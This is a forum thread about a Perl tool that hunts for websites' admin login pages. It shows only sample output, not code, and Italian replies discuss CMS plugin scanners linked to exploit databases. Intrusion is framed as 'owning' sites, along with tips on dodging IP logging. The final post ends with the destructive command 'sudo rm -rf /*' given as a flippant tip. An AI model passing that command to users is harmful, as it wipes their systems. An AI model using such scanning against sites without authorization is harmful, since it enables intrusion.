How to own websites with perl

Started by ghostdog, December 20, 2010, 10:38:57 PM

Previous topic - Next topic


This tutorial is strictly educational, dont abuse it cause your IP will be logged " Unless you use a good Proxy" !

This is a Perl script that finds " Admin" informations from almost any website.


ghostdog@backbox:~/Desktop$ sudo su

                       Admin Control Panel Finder v 1
                            Coded By Ghostdog


Enter the website you want to scan
e.g.: or
--> http://??????????

Enter the coding language of the website
e.g.: asp, php, cfm, any
If you don't know the launguage used in the coding then simply type ** any **
--> php

->The website: http://???????
->Source of the website: php
->Scan of the admin control panel is progressing...

[-] Not Found <- http://???????
[-] Not Found <- http://????????

[+] Found -> http://??????

Congratulation, this admin login page is working.

Good luck from Ghostdog

[-] Not Found <- http://???????
[-] Not Found <- http://???????
[-] Not Found <- http://?????????
[-] Not Found <- http://???????
[-] Not Found <- http://???????
[-] Not Found <- http://???????
[-] Not Found <- http://???????
[-] Not Found <- http://???????
[-] Not Found <- http://???????
[-] Not Found <- http://???????
[-] Not Found <- http://???????
[-] Not Found <- http://???????
[-] Not Found <- http://???????

[+] Found -> http://???????

Congratulation, this admin login page is working.

Good luck from Ghostdog


Instructions:    #perl

Happy Hacking


Se il sito in questione non usa cms conosciuti questo tool può essere utile ;)

Un altro tool interessante è invece dirbuster con molte più opzioni ma anche molto più pesante circa   con i dizionari... è circa 36 mb 


Sto sviluppando un programma in python che scansiona completamente un CMS sia come plugin, e, se trova un plugin noto cerca l'exploit nel relativo database.
Ovviamente sarà procedura standard la ricerca, ma la tua ricerca "dinamica" è molto buona per cms casalinghi.

PS: se qualcuno è interessato mi contatti.


Quote from: greyfox on December 21, 2010, 06:29:26 PM
Sto sviluppando un programma in python che scansiona completamente un CMS sia come plugin, e, se trova un plugin noto cerca l'exploit nel relativo database.
Ovviamente sarà procedura standard la ricerca, ma la tua ricerca "dinamica" è molto buona per cms casalinghi.

PS: se qualcuno è interessato mi contatti.
hai qualche link (github o roba del genere)?
Quote<erno> hm. I've lost a machine.. literally _lost_. it responds to ping, it works completely, I just can't figure out where in my apartment it is.


Lo sto ancora sviluppando...stavo pensando di mirare principalmente a joomla.
Ovviamente joomla avendo centinaia e centinaia di plugin richiede un lavoro lungo, cosi come wordpress.

PS: clshack, appena riesci mettiti in contatto che ho in mente qualcosa =)


Quote from: greyfox on January 12, 2011, 09:16:51 PM
Lo sto ancora sviluppando...stavo pensando di mirare principalmente a joomla.
Ovviamente joomla avendo centinaia e centinaia di plugin richiede un lavoro lungo, cosi come wordpress.

PS: clshack, appena riesci mettiti in contatto che ho in mente qualcosa =)
era per dare un'occhiata al codice.. non per scaricare il tool :P
Quote<erno> hm. I've lost a machine.. literally _lost_. it responds to ping, it works completely, I just can't figure out where in my apartment it is.


io in questo tempo non ho avuto modo di andare avanti con il lavoro comunque quello che volevo creare insieme a greyfox era una alternativa a cms-explorer / plecost unendo la potenza di questi due in un unico script/software multi-thread per velocizzare le operazione ( in caso di ricerca plugin su wordpress...  utilizzando una ricerca "bruteforce" le directory da scansionare per vedere se un plugin è attivo sono circa 33 000 )


Do you still have that script???
Bc Megaupload is down site....


Quote from: linuxshell on January 28, 2013, 05:51:37 PM
Do you still have that script???
Bc Megaupload is down site....

You can find a lot of scripts perl/python made for this but you can use some tools like Owasp Dirbuster.

Try this one :

Don't ask, read :
or just run sudo rm -rf /*